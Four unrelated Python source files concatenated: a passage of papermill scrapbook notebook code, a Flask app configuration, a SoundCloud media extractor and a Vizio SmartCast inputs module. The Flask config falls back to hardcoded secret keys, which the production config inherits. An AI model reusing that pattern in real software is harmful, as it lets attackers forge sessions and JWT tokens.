# Strip old metadata name
copied.pop("papermill", None)
copied.pop("scrapbook", None)
return copied
@kernel_required
def reglue(self, name, new_name=None, raise_on_missing=True, unattached=False):
"""
Display output from a named source of the notebook.
Parameters
----------
name : str
name of scrap object
new_name : str
replacement name for scrap
raise_error : bool
indicator for if the resketch should print a message or error on missing snaps
unattached : bool
indicator for rendering without making the display recallable as scrapbook data
"""
# Avoid circular imports
from .api import _prepare_ipy_data_format, _prepare_ipy_display_format
if name not in self.scraps:
if raise_on_missing:
raise ScrapbookException(
"Scrap '{}' is not available in this notebook.".format(name)
)
else:
ip_display(
"No scrap found with name '{}' in this notebook".format(name)
)
else:
scrap = self.scraps[name]
if new_name:
scrap = scrap._replace(name=new_name)
if scrap.data is not None:
data, metadata = _prepare_ipy_data_format(
scrap.name, scrap_to_payload(scrap), scrap.encoder
)
# Skip saving data for later regluing and remove 'scrapbook'
# from keys, when unattached
if unattached:
metadata = self._strip_scrapbook_metadata(metadata)
ip_display(data, metadata=metadata, raw=True)
if scrap.display is not None:
scrap_data = scrap.display.get("data", {})
scrap_metadata = self._strip_scrapbook_metadata(
scrap.display.get("metadata", {})
)
data, metadata = _prepare_ipy_display_format(
scrap.name, scrap_data, scrap_metadata
)
if unattached:
# Remove 'scrapbook' from keys if we want it unassociated
metadata = self._strip_scrapbook_metadata(metadata)
ip_display(data, metadata=metadata, raw=True)
class Scrapbook(collections.MutableMapping):
"""
A collection of notebooks represented as a dictionary of notebooks
"""
def __init__(self):
self._notebooks = OrderedDict()
def __setitem__(self, key, value):
# If notebook is a path str then load the notebook.
if isinstance(value, string_types):
value = Notebook(value)
self._notebooks.__setitem__(key, value)
def __getitem__(self, key):
return self._notebooks.__getitem__(key)
def __delitem__(self, key):
return self._notebooks.__delitem__(key)
def __iter__(self):
return self._notebooks.__iter__()
def __len__(self):
return self._notebooks.__len__()
@property
@deprecated('1.0.0')
def papermill_dataframe(self):
"""list: a list of data names from a collection of notebooks"""
# Backwards compatible dataframe interface
df_list = []
for key in self._notebooks:
nb = self._notebooks[key]
df = nb.papermill_dataframe
df["key"] = key
df_list.append(df)
return pd.concat(df_list).reset_index(drop=True)
@property
@deprecated('0.4.0', 'metrics')
def papermill_metrics(self):
return self.metrics
@property
def metrics(self):
"""list: a list of metrics from a collection of notebooks"""
df_list = []
for key in self._notebooks:
nb = self._notebooks[key]
df = nb.metrics
df["key"] = key
df_list.append(df)
return pd.concat(df_list).reset_index(drop=True)
@property
def notebooks(self):
"""list: a sorted list of associated notebooks."""
return self.values()
@property
def notebook_scraps(self):
"""dict: a dictionary of the notebook scraps by key."""
return OrderedDict([(key, nb.scraps) for key, nb in self._notebooks.items()])
@property
def scraps(self):
"""dict: a dictionary of the merged notebook scraps."""
return Scraps(merge_dicts(nb.scraps for nb in self.notebooks))
def scraps_report(
self, scrap_names=None, notebook_names=None, include_data=False, headers=True
):
"""
Display scraps as markdown structed outputs.
Parameters
----------
scrap_names : str or iterable[str] (optional)
the scraps to display as reported outputs
notebook_names : str or iterable[str] (optional)
notebook names to use in filtering on scraps to report
include_data : bool (default: False)
indicator that data-only scraps should be reported
header : bool (default: True)
indicator for if the scraps should render with a header
"""
def trim_repr(data):
# Generate a small data representation for display purposes
if not isinstance(data, string_types):
data_str = repr(data)
if len(data_str) > 102:
data_str = data_str[:100] + "..."
return data_str
if isinstance(scrap_names, string_types):
scrap_names = [scrap_names]
scrap_names = set(scrap_names or [])
if notebook_names is None:
notebook_names = self._notebooks.keys()
elif isinstance(notebook_names, string_types):
notebook_names = [notebook_names]
for i, nb_name in enumerate(notebook_names):
notebook = self[nb_name]
if headers:
if i > 0:
ip_display(Markdown("<hr>")) # tag between outputs
ip_display(Markdown("### {}".format(nb_name)))
for name in scrap_names or notebook.scraps.display_scraps.keys():
if headers:
ip_display(Markdown("#### {}".format(name)))
notebook.reglue(name, raise_on_missing=False, unattached=True)
if include_data:
for name, scrap in scrap_names or notebook.scraps.data_scraps.items():
if scrap.display is None and scrap.data is not None:
if headers:
ip_display(Markdown("#### {}".format(name)))
ip_display(trim_repr(scrap.data))
else:
ip_display(
"{}: {}".format(scrap.name, trim_repr(scrap.data))
)
|
import os
basedir = os.path.abspath(os.path.dirname(__file__))
imagesdir = os.path.join(os.path.dirname(basedir),'uploads')
"""Constants used throughout the application.
All hard coded settings/data that are not actual/official configuration
options for Flask and their extensions goes here.
"""
class Config:
"""Default Flask configuration inherited by all environments. Use this for
development environments.
"""
SECRET_KEY = os.environ.get("SECRET_KEY") or "big secret"
JWT_SECRET_KEY = os.environ.get("SECRET_KEY") or "very big secret"
JWT_BLACKLIST_ENABLED = True
JWT_BLACKLIST_TOKEN_CHECKS = ["access", "refresh"]
LABELS_ALLOWED = ["bbox","polygon"]
TEAMS_ALLOWED = ["labels","images","image labelling","models"]
@staticmethod
def init_app(app):
pass
class DevelopmentConfig(Config):
"""Development Congigurations"""
DEBUG = True
SQLALCHEMY_DATABASE_URI = os.environ.get(
"DEV_DATABASE_URL"
)
SQLALCHEMY_TRACK_MODIFICATIONS = False
# needs to be removed in further versions
ML_FILES_DIR = os.path.join(os.path.dirname(basedir),'ml_files')
UPLOAD_FOLDER = imagesdir
class TestingConfig(Config):
"""
Testing config applies for both local testing and travis configurations
"""
TESTING = True
WTF_CSRF_ENABLED = False
TEST_DATABASE = os.environ.get(
"TEST_DATABASE_URL"
)
if os.getenv("FLASK_CONFIG")=="travis":
pass
else:
from sqlalchemy_utils.functions import database_exists, create_database
if not database_exists(TEST_DATABASE):
create_database(TEST_DATABASE)
SQLALCHEMY_DATABASE_URI = TEST_DATABASE
SQLALCHEMY_TRACK_MODIFICATIONS = False
# needs to be removed in further versions
UPLOAD_FOLDER = imagesdir
class ProductionConfig(Config):
"""Production Congigurations"""
SQLALCHEMY_DATABASE_URI = os.environ.get(
"DATABASE_URL"
)
@classmethod
def init_app(cls, app):
Config.init_app(app)
class DockerConfig(Config):
"""Docker config"""
@classmethod
def init_app(cls, app):
ProductionConfig.init_app(app)
# log to stderr
import logging
from logging import StreamHandler
file_handler = StreamHandler()
file_handler.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
class TravisConfig(Config):
"""
Configs for travis
"""
TESTING = True
WTF_CSRF_ENABLED = False
SQLALCHEMY_TRACK_MODIFICATIONS = False
# needs to be removed in further versions
UPLOAD_FOLDER = imagesdir
ML_FILES_DIR = os.path.join(os.path.dirname(basedir),'ml_files')
LABELS_ALLOWED = ["bbox","polygon"]
TEAMS_ALLOWED = ["labels","images","image labelling","models"]
config = {
"development": DevelopmentConfig,
"testing": TestingConfig,
"production": ProductionConfig,
"docker": DockerConfig,
"default": DevelopmentConfig,
"travis": TravisConfig
}
|
# coding: utf-8
from __future__ import unicode_literals
import itertools
import re
from .common import (
InfoExtractor,
SearchInfoExtractor
)
from ..compat import (
compat_HTTPError,
compat_kwargs,
compat_str,
compat_urlparse,
)
from ..utils import (
error_to_compat_str,
ExtractorError,
float_or_none,
HEADRequest,
int_or_none,
KNOWN_EXTENSIONS,
mimetype2ext,
str_or_none,
try_get,
unescapeHTML,
unified_timestamp,
update_url_query,
url_or_none,
urlhandle_detect_ext,
)
try:
from ..extractor_artifacts.soundcloud import prerelease_client_id
except ImportError:
prerelease_client_id = None
class SoundcloudEmbedIE(InfoExtractor):
_VALID_URL = r'https?://(?:w|player|p)\.soundcloud\.com/player/?.*?\burl=(?P<id>.+)'
_TEST = {
# from https://www.soundi.fi/uutiset/ennakkokuuntelussa-timo-kaukolammen-station-to-station-to-station-julkaisua-juhlitaan-tanaan-g-livelabissa/
'url': 'https://w.soundcloud.com/player/?visual=true&url=https%3A%2F%2Fapi.soundcloud.com%2Fplaylists%2F922213810&show_artwork=true&maxwidth=640&maxheight=960&dnt=1&secret_token=s-ziYey',
'only_matching': True,
}
@staticmethod
def _extract_urls(webpage, **kwargs):
return [unescapeHTML(m.group('url')) for m in re.finditer(
r'<iframe[^>]+src=(["\'])(?P<url>(?:https?://)?(?:w\.)?soundcloud\.com/player.+?)\1',
webpage)]
def _real_extract(self, url):
query = compat_urlparse.parse_qs(
compat_urlparse.urlparse(url).query)
api_url = query['url'][0]
secret_token = query.get('secret_token')
if secret_token:
api_url = update_url_query(api_url, {'secret_token': secret_token[0]})
return self.url_result(api_url)
class SoundcloudIE(InfoExtractor):
"""Information extractor for soundcloud.com
To access the media, the uid of the song and a stream token
must be extracted from the page source and the script must make
a request to media.soundcloud.com/crossdomain.xml. Then
the media can be grabbed by requesting from an url composed
of the stream token and uid
"""
_VALID_URL = r'''(?x)^(?:https?://)?
(?:(?:(?:www\.|m\.)?soundcloud\.com/
(?!stations/track)
(?P<uploader>[\w\d-]+)/
(?!(?:tracks|albums|sets(?:/.+?)?|reposts|likes|spotlight)/?(?:$|[?#]))
(?P<title>[\w\d-]+)/?
(?P<token>[^?]+?)?(?:[?].*)?$)
|(?:api(?:-v2)?\.soundcloud\.com/tracks/(?P<track_id>\d+)
(?:/?\?secret_token=(?P<secret_token>[^&]+))?)
)
'''
IE_NAME = 'soundcloud'
_TESTS = [
{
'url': 'http://soundcloud.com/ethmusic/lostin-powers-she-so-heavy',
'md5': 'ebef0a451b909710ed1d7787dddbf0d7',
'info_dict': {
'id': '62986583',
'ext': 'mp3',
'title': 'Lostin Powers - She so Heavy (SneakPreview) Adrian Ackers Blueprint 1',
'description': 'No Downloads untill we record the finished version this weekend, i was too pumped n i had to post it , earl is prolly gonna b hella p.o\'d',
'uploader': 'E.T. ExTerrestrial Music',
'uploader_id': '1571244',
'timestamp': 1349920598,
'upload_date': '20121011',
'duration': 143.216,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
}
},
# geo-restricted
{
'url': 'https://soundcloud.com/the-concept-band/goldrushed-mastered?in=the-concept-band/sets/the-royal-concept-ep',
'info_dict': {
'id': '47127627',
'ext': 'mp3',
'title': 'Goldrushed',
'description': 'From Stockholm Sweden\r\nPovel / Magnus / Filip / David\r\nwww.theroyalconcept.com',
'uploader': 'The Royal Concept',
'uploader_id': '9615865',
'timestamp': 1337635207,
'upload_date': '20120521',
'duration': 227.155,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# private link
{
'url': 'https://soundcloud.com/jaimemf/haruhi-dl-test-video-a-y-baw/s-8Pjrp',
'md5': 'aa0dd32bfea9b0c5ef4f02aacd080604',
'info_dict': {
'id': '123998367',
'ext': 'mp3',
'title': 'Youtube - Dl Test Video \'\' Ä↭',
'description': 'test chars: \"\'/\\ä↭',
'uploader': 'jaimeMF',
'uploader_id': '69767071',
'timestamp': 1386604920,
'upload_date': '20131209',
'duration': 9.927,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# private link (alt format)
{
'url': 'https://api.soundcloud.com/tracks/123998367?secret_token=s-8Pjrp',
'md5': 'aa0dd32bfea9b0c5ef4f02aacd080604',
'info_dict': {
'id': '123998367',
'ext': 'mp3',
'title': 'Youtube - Dl Test Video \'\' Ä↭',
'description': 'test chars: \"\'/\\ä↭',
'uploader': 'jaimeMF',
'uploader_id': '69767071',
'timestamp': 1386604920,
'upload_date': '20131209',
'duration': 9.927,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# downloadable song
{
'url': 'https://soundcloud.com/oddsamples/bus-brakes',
'md5': '7624f2351f8a3b2e7cd51522496e7631',
'info_dict': {
'id': '128590877',
'ext': 'mp3',
'title': 'Bus Brakes',
'description': 'md5:0053ca6396e8d2fd7b7e1595ef12ab66',
'uploader': 'oddsamples',
'uploader_id': '73680509',
'timestamp': 1389232924,
'upload_date': '20140109',
'duration': 17.346,
'license': 'cc-by-sa',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# private link, downloadable format
{
'url': 'https://soundcloud.com/oriuplift/uponly-238-no-talking-wav/s-AyZUd',
'md5': '64a60b16e617d41d0bef032b7f55441e',
'info_dict': {
'id': '340344461',
'ext': 'wav',
'title': 'Uplifting Only 238 [No Talking] (incl. Alex Feed Guestmix) (Aug 31, 2017) [wav]',
'description': 'md5:fa20ee0fca76a3d6df8c7e57f3715366',
'uploader': 'Ori Uplift Music',
'uploader_id': '12563093',
'timestamp': 1504206263,
'upload_date': '20170831',
'duration': 7449.096,
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
# no album art, use avatar pic for thumbnail
{
'url': 'https://soundcloud.com/garyvee/sideways-prod-mad-real',
'md5': '59c7872bc44e5d99b7211891664760c2',
'info_dict': {
'id': '309699954',
'ext': 'mp3',
'title': 'Sideways (Prod. Mad Real)',
'description': 'md5:d41d8cd98f00b204e9800998ecf8427e',
'uploader': 'garyvee',
'uploader_id': '2366352',
'timestamp': 1488152409,
'upload_date': '20170226',
'duration': 207.012,
'thumbnail': r're:https?://.*\.jpg',
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://soundcloud.com/giovannisarani/mezzo-valzer',
'md5': 'e22aecd2bc88e0e4e432d7dcc0a1abf7',
'info_dict': {
'id': '583011102',
'ext': 'mp3',
'title': 'Mezzo Valzer',
'description': 'md5:4138d582f81866a530317bae316e8b61',
'uploader': 'Micronie',
'uploader_id': '3352531',
'timestamp': 1551394171,
'upload_date': '20190228',
'duration': 180.157,
'thumbnail': r're:https?://.*\.jpg',
'license': 'all-rights-reserved',
'view_count': int,
'like_count': int,
'comment_count': int,
'repost_count': int,
},
},
{
# with AAC HQ format available via OAuth token
'url': 'https://soundcloud.com/wandw/the-chainsmokers-ft-daya-dont-let-me-down-ww-remix-1',
'only_matching': True,
},
]
_API_V2_BASE = 'https://api-v2.soundcloud.com/'
_BASE_URL = 'https://soundcloud.com/'
_IMAGE_REPL_RE = r'-([0-9a-z]+)\.jpg'
_ARTWORK_MAP = {
'mini': 16,
'tiny': 20,
'small': 32,
'badge': 47,
't67x67': 67,
'large': 100,
't300x300': 300,
'crop': 400,
't500x500': 500,
'original': 0,
}
def _store_client_id(self, client_id):
self._downloader.cache.store('soundcloud', 'client_id', client_id)
def _update_client_id(self):
webpage = self._download_webpage('https://soundcloud.com/', None)
for src in reversed(re.findall(r'<script[^>]+src="([^"]+)"', webpage)):
script = self._download_webpage(src, None, fatal=False)
if script:
client_id = self._search_regex(
r'client_id\s*:\s*"([0-9a-zA-Z]{32})"',
script, 'client id', default=None)
if client_id:
self._CLIENT_ID = client_id
self._store_client_id(client_id)
return
raise ExtractorError('Unable to extract client id')
def _generate_prerelease_file(self):
self._update_client_id()
return 'prerelease_client_id = {!r}\n'.format(self._CLIENT_ID)
def _download_json(self, *args, **kwargs):
non_fatal = kwargs.get('fatal') is False
if non_fatal:
del kwargs['fatal']
query = kwargs.get('query', {}).copy()
for _ in range(2):
query['client_id'] = self._CLIENT_ID
kwargs['query'] = query
try:
return super(SoundcloudIE, self)._download_json(*args, **compat_kwargs(kwargs))
except ExtractorError as e:
if isinstance(e.cause, compat_HTTPError) and e.cause.code == 401:
self._store_client_id(None)
self._update_client_id()
continue
elif non_fatal:
self._downloader.report_warning(error_to_compat_str(e))
return False
raise
def _real_initialize(self):
self._CLIENT_ID = self._downloader.cache.load('soundcloud', 'client_id') or prerelease_client_id or 'YUKXoArFcqrlQn9tfNHvvyfnDISj04zk'
@classmethod
def _resolv_url(cls, url):
return SoundcloudIE._API_V2_BASE + 'resolve?url=' + url
def _extract_info_dict(self, info, full_title=None, secret_token=None):
track_id = compat_str(info['id'])
title = info['title']
format_urls = set()
formats = []
query = {'client_id': self._CLIENT_ID}
if secret_token:
query['secret_token'] = secret_token
if info.get('downloadable') and info.get('has_downloads_left'):
download_url = update_url_query(
self._API_V2_BASE + 'tracks/' + track_id + '/download', query)
redirect_url = (self._download_json(download_url, track_id, fatal=False) or {}).get('redirectUri')
if redirect_url:
urlh = self._request_webpage(
HEADRequest(redirect_url), track_id, fatal=False)
if urlh:
format_url = urlh.geturl()
format_urls.add(format_url)
formats.append({
'format_id': 'download',
'ext': urlhandle_detect_ext(urlh) or 'mp3',
'filesize': int_or_none(urlh.headers.get('Content-Length')),
'url': format_url,
'preference': 10,
})
def invalid_url(url):
return not url or url in format_urls
def add_format(f, protocol, is_preview=False):
mobj = re.search(r'\.(?P<abr>\d+)\.(?P<ext>[0-9a-z]{3,4})(?=[/?])', stream_url)
if mobj:
for k, v in mobj.groupdict().items():
if not f.get(k):
f[k] = v
format_id_list = []
if protocol:
format_id_list.append(protocol)
ext = f.get('ext')
if ext == 'aac':
f['abr'] = '256'
for k in ('ext', 'abr'):
v = f.get(k)
if v:
format_id_list.append(v)
preview = is_preview or re.search(r'/(?:preview|playlist)/0/30/', f['url'])
if preview:
format_id_list.append('preview')
abr = f.get('abr')
if abr:
f['abr'] = int(abr)
if protocol == 'hls':
protocol = 'm3u8' if ext == 'aac' else 'm3u8_native'
else:
protocol = 'http'
f.update({
'format_id': '_'.join(format_id_list),
'protocol': protocol,
'preference': -10 if preview else None,
})
formats.append(f)
# New API
transcodings = try_get(
info, lambda x: x['media']['transcodings'], list) or []
for t in transcodings:
if not isinstance(t, dict):
continue
format_url = url_or_none(t.get('url'))
if not format_url:
continue
stream = self._download_json(
format_url, track_id, query=query, fatal=False)
if not isinstance(stream, dict):
continue
stream_url = url_or_none(stream.get('url'))
if invalid_url(stream_url):
continue
format_urls.add(stream_url)
stream_format = t.get('format') or {}
protocol = stream_format.get('protocol')
if protocol != 'hls' and '/hls' in format_url:
protocol = 'hls'
ext = None
preset = str_or_none(t.get('preset'))
if preset:
ext = preset.split('_')[0]
if ext not in KNOWN_EXTENSIONS:
ext = mimetype2ext(stream_format.get('mime_type'))
add_format({
'url': stream_url,
'ext': ext,
}, 'http' if protocol == 'progressive' else protocol,
t.get('snipped') or '/preview/' in format_url)
for f in formats:
f['vcodec'] = 'none'
if not formats and info.get('policy') == 'BLOCK':
self.raise_geo_restricted()
self._sort_formats(formats)
user = info.get('user') or {}
thumbnails = []
artwork_url = info.get('artwork_url')
thumbnail = artwork_url or user.get('avatar_url')
if isinstance(thumbnail, compat_str):
if re.search(self._IMAGE_REPL_RE, thumbnail):
for image_id, size in self._ARTWORK_MAP.items():
i = {
'id': image_id,
'url': re.sub(self._IMAGE_REPL_RE, '-%s.jpg' % image_id, thumbnail),
}
if image_id == 'tiny' and not artwork_url:
size = 18
elif image_id == 'original':
i['preference'] = 10
if size:
i.update({
'width': size,
'height': size,
})
thumbnails.append(i)
else:
thumbnails = [{'url': thumbnail}]
def extract_count(key):
return int_or_none(info.get('%s_count' % key))
return {
'id': track_id,
'uploader': user.get('username'),
'uploader_id': str_or_none(user.get('id')) or user.get('permalink'),
'uploader_url': user.get('permalink_url'),
'timestamp': unified_timestamp(info.get('created_at')),
'title': title,
'description': info.get('description'),
'thumbnails': thumbnails,
'duration': float_or_none(info.get('duration'), 1000),
'webpage_url': info.get('permalink_url'),
'license': info.get('license'),
'view_count': extract_count('playback'),
'like_count': extract_count('favoritings') or extract_count('likes'),
'comment_count': extract_count('comment'),
'repost_count': extract_count('reposts'),
'genre': info.get('genre'),
'formats': formats
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
track_id = mobj.group('track_id')
query = {}
if track_id:
info_json_url = self._API_V2_BASE + 'tracks/' + track_id
full_title = track_id
token = mobj.group('secret_token')
if token:
query['secret_token'] = token
else:
full_title = resolve_title = '%s/%s' % mobj.group('uploader', 'title')
token = mobj.group('token')
if token:
resolve_title += '/%s' % token
info_json_url = self._resolv_url(self._BASE_URL + resolve_title)
info = self._download_json(
info_json_url, full_title, 'Downloading info JSON', query=query)
return self._extract_info_dict(info, full_title, token)
class SoundcloudPlaylistBaseIE(SoundcloudIE):
def _extract_set(self, playlist, token=None):
playlist_id = compat_str(playlist['id'])
tracks = playlist.get('tracks') or []
if not all([t.get('permalink_url') for t in tracks]) and token:
tracks = self._download_json(
self._API_V2_BASE + 'tracks', playlist_id,
'Downloading tracks', query={
'ids': ','.join([compat_str(t['id']) for t in tracks]),
'playlistId': playlist_id,
'playlistSecretToken': token,
})
entries = []
for track in tracks:
track_id = str_or_none(track.get('id'))
url = track.get('permalink_url')
if not url:
if not track_id:
continue
url = self._API_V2_BASE + 'tracks/' + track_id
if token:
url += '?secret_token=' + token
entries.append(self.url_result(
url, SoundcloudIE.ie_key(), track_id))
return self.playlist_result(
entries, playlist_id,
playlist.get('title'),
playlist.get('description'))
class SoundcloudSetIE(SoundcloudPlaylistBaseIE):
_VALID_URL = r'https?://(?:(?:www|m)\.)?soundcloud\.com/(?P<uploader>[\w\d-]+)/sets/(?P<slug_title>[\w\d-]+)(?:/(?P<token>[^?/]+))?'
IE_NAME = 'soundcloud:set'
_TESTS = [{
'url': 'https://soundcloud.com/the-concept-band/sets/the-royal-concept-ep',
'info_dict': {
'id': '2284613',
'title': 'The Royal Concept EP',
'description': 'md5:71d07087c7a449e8941a70a29e34671e',
},
'playlist_mincount': 5,
}, {
'url': 'https://soundcloud.com/the-concept-band/sets/the-royal-concept-ep/token',
'only_matching': True,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
full_title = '%s/sets/%s' % mobj.group('uploader', 'slug_title')
token = mobj.group('token')
if token:
full_title += '/' + token
info = self._download_json(self._resolv_url(
self._BASE_URL + full_title), full_title)
if 'errors' in info:
msgs = (compat_str(err['error_message']) for err in info['errors'])
raise ExtractorError('unable to download video webpage: %s' % ','.join(msgs))
return self._extract_set(info, token)
class SoundcloudPagedPlaylistBaseIE(SoundcloudIE):
def _extract_playlist(self, base_url, playlist_id, playlist_title):
# Per the SoundCloud documentation, the maximum limit for a linked partioning query is 200.
# https://developers.soundcloud.com/blog/offset-pagination-deprecated
COMMON_QUERY = {
'limit': 200,
'linked_partitioning': '1',
}
query = COMMON_QUERY.copy()
query['offset'] = 0
next_href = base_url
entries = []
for i in itertools.count():
response = self._download_json(
next_href, playlist_id,
'Downloading track page %s' % (i + 1), query=query)
collection = response['collection']
if not isinstance(collection, list):
collection = []
# Empty collection may be returned, in this case we proceed
# straight to next_href
def resolve_entry(candidates):
for cand in candidates:
if not isinstance(cand, dict):
continue
permalink_url = url_or_none(cand.get('permalink_url'))
if not permalink_url:
continue
return self.url_result(
permalink_url,
SoundcloudIE.ie_key() if SoundcloudIE.suitable(permalink_url) else None,
str_or_none(cand.get('id')), cand.get('title'))
for e in collection:
entry = resolve_entry((e, e.get('track'), e.get('playlist')))
if entry:
entries.append(entry)
next_href = response.get('next_href')
if not next_href:
break
next_href = response['next_href']
parsed_next_href = compat_urlparse.urlparse(next_href)
query = compat_urlparse.parse_qs(parsed_next_href.query)
query.update(COMMON_QUERY)
return {
'_type': 'playlist',
'id': playlist_id,
'title': playlist_title,
'entries': entries,
}
class SoundcloudUserIE(SoundcloudPagedPlaylistBaseIE):
_VALID_URL = r'''(?x)
https?://
(?:(?:www|m)\.)?soundcloud\.com/
(?P<user>[^/]+)
(?:/
(?P<rsrc>tracks|albums|sets|reposts|likes|spotlight)
)?
/?(?:[?#].*)?$
'''
IE_NAME = 'soundcloud:user'
_TESTS = [{
'url': 'https://soundcloud.com/soft-cell-official',
'info_dict': {
'id': '207965082',
'title': 'Soft Cell (All)',
},
'playlist_mincount': 28,
}, {
'url': 'https://soundcloud.com/soft-cell-official/tracks',
'info_dict': {
'id': '207965082',
'title': 'Soft Cell (Tracks)',
},
'playlist_mincount': 27,
}, {
'url': 'https://soundcloud.com/soft-cell-official/albums',
'info_dict': {
'id': '207965082',
'title': 'Soft Cell (Albums)',
},
'playlist_mincount': 1,
}, {
'url': 'https://soundcloud.com/jcv246/sets',
'info_dict': {
'id': '12982173',
'title': 'Jordi / cv (Sets)',
},
'playlist_mincount': 2,
}, {
'url': 'https://soundcloud.com/jcv246/reposts',
'info_dict': {
'id': '12982173',
'title': 'Jordi / cv (Reposts)',
},
'playlist_mincount': 6,
}, {
'url': 'https://soundcloud.com/clalberg/likes',
'info_dict': {
'id': '11817582',
'title': 'clalberg (Likes)',
},
'playlist_mincount': 5,
}, {
'url': 'https://soundcloud.com/grynpyret/spotlight',
'info_dict': {
'id': '7098329',
'title': 'Grynpyret (Spotlight)',
},
'playlist_mincount': 1,
}]
_BASE_URL_MAP = {
'all': 'stream/users/%s',
'tracks': 'users/%s/tracks',
'albums': 'users/%s/albums',
'sets': 'users/%s/playlists',
'reposts': 'stream/users/%s/reposts',
'likes': 'users/%s/likes',
'spotlight': 'users/%s/spotlight',
}
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
uploader = mobj.group('user')
user = self._download_json(
self._resolv_url(self._BASE_URL + uploader),
uploader, 'Downloading user info')
resource = mobj.group('rsrc') or 'all'
return self._extract_playlist(
self._API_V2_BASE + self._BASE_URL_MAP[resource] % user['id'],
str_or_none(user.get('id')),
'%s (%s)' % (user['username'], resource.capitalize()))
class SoundcloudTrackStationIE(SoundcloudPagedPlaylistBaseIE):
_VALID_URL = r'https?://(?:(?:www|m)\.)?soundcloud\.com/stations/track/[^/]+/(?P<id>[^/?#&]+)'
IE_NAME = 'soundcloud:trackstation'
_TESTS = [{
'url': 'https://soundcloud.com/stations/track/officialsundial/your-text',
'info_dict': {
'id': '286017854',
'title': 'Track station: your text',
},
'playlist_mincount': 47,
}]
def _real_extract(self, url):
track_name = self._match_id(url)
track = self._download_json(self._resolv_url(url), track_name)
track_id = self._search_regex(
r'soundcloud:track-stations:(\d+)', track['id'], 'track id')
return self._extract_playlist(
self._API_V2_BASE + 'stations/%s/tracks' % track['id'],
track_id, 'Track station: %s' % track['title'])
class SoundcloudPlaylistIE(SoundcloudPlaylistBaseIE):
_VALID_URL = r'https?://api(?:-v2)?\.soundcloud\.com/playlists/(?P<id>[0-9]+)(?:/?\?secret_token=(?P<token>[^&]+?))?$'
IE_NAME = 'soundcloud:playlist'
_TESTS = [{
'url': 'https://api.soundcloud.com/playlists/4110309',
'info_dict': {
'id': '4110309',
'title': 'TILT Brass - Bowery Poetry Club, August \'03 [Non-Site SCR 02]',
'description': 're:.*?TILT Brass - Bowery Poetry Club',
},
'playlist_count': 6,
}]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
playlist_id = mobj.group('id')
query = {}
token = mobj.group('token')
if token:
query['secret_token'] = token
data = self._download_json(
self._API_V2_BASE + 'playlists/' + playlist_id,
playlist_id, 'Downloading playlist', query=query)
return self._extract_set(data, token)
class SoundcloudSearchIE(SearchInfoExtractor, SoundcloudIE):
IE_NAME = 'soundcloud:search'
IE_DESC = 'Soundcloud search'
_MAX_RESULTS = float('inf')
_TESTS = [{
'url': 'scsearch15:post-avant jazzcore',
'info_dict': {
'title': 'post-avant jazzcore',
},
'playlist_count': 15,
}]
_SEARCH_KEY = 'scsearch'
_MAX_RESULTS_PER_PAGE = 200
_DEFAULT_RESULTS_PER_PAGE = 50
def _get_collection(self, endpoint, collection_id, **query):
limit = min(
query.get('limit', self._DEFAULT_RESULTS_PER_PAGE),
self._MAX_RESULTS_PER_PAGE)
query.update({
'limit': limit,
'linked_partitioning': 1,
'offset': 0,
})
next_url = update_url_query(self._API_V2_BASE + endpoint, query)
collected_results = 0
for i in itertools.count(1):
response = self._download_json(
next_url, collection_id, 'Downloading page {0}'.format(i),
'Unable to download API page')
collection = response.get('collection', [])
if not collection:
break
collection = list(filter(bool, collection))
collected_results += len(collection)
for item in collection:
yield self.url_result(item['uri'], SoundcloudIE.ie_key())
if not collection or collected_results >= limit:
break
next_url = response.get('next_href')
if not next_url:
break
def _get_n_results(self, query, n):
tracks = self._get_collection('search/tracks', query, limit=n, q=query)
return self.playlist_result(tracks, playlist_title=query)
|
"""Vizio SmartCast API commands and class for device inputs."""
from typing import Any, Dict, List, Optional
from pyvizio.api._protocol import ResponseKey
from pyvizio.api.item import Item, ItemCommandBase, ItemInfoCommandBase
from pyvizio.helpers import dict_get_case_insensitive
class InputItem(Item):
"""Input device."""
def __init__(self, json_item: Dict[str, Any], is_extended_metadata: bool) -> None:
"""Initialize input device."""
super(InputItem, self).__init__(json_item)
self.meta_name = None
self.meta_data = None
meta = dict_get_case_insensitive(json_item, ResponseKey.VALUE)
if meta:
if is_extended_metadata:
self.meta_name = dict_get_case_insensitive(meta, ResponseKey.NAME)
self.meta_data = dict_get_case_insensitive(meta, ResponseKey.METADATA)
else:
self.meta_name = meta
if not self.meta_name:
self.meta_name = self.c_name
class GetInputsListCommand(ItemInfoCommandBase):
"""Command to get list of available inputs."""
def __init__(self, device_type: str) -> None:
"""Initialize command to get list of available inputs."""
super(GetInputsListCommand, self).__init__(device_type, "INPUTS")
def process_response(self, json_obj: Dict[str, Any]) -> Optional[List[InputItem]]:
"""Return response to command to get list of available inputs."""
items = dict_get_case_insensitive(json_obj, ResponseKey.ITEMS)
if items:
return [
InputItem(itm, True)
for itm in items
if dict_get_case_insensitive(itm, ResponseKey.CNAME) != "current_input"
]
return None
class GetCurrentInputCommand(ItemInfoCommandBase):
"""Command to get currently active input."""
def __init__(self, device_type: str) -> None:
"""Initialize command to get currently active input."""
super(GetCurrentInputCommand, self).__init__(device_type, "CURRENT_INPUT")
def process_response(self, json_obj: Dict[str, Any]) -> Optional[InputItem]:
"""Return response to command to get currently active input."""
items = dict_get_case_insensitive(json_obj, ResponseKey.ITEMS)
v_input = None
if items:
v_input = InputItem(items[0], False)
return v_input
class ChangeInputCommand(ItemCommandBase):
"""Command to change active input by name."""
def __init__(self, device_type: str, id: int, name: str) -> None:
"""Initialize command to change active input by name."""
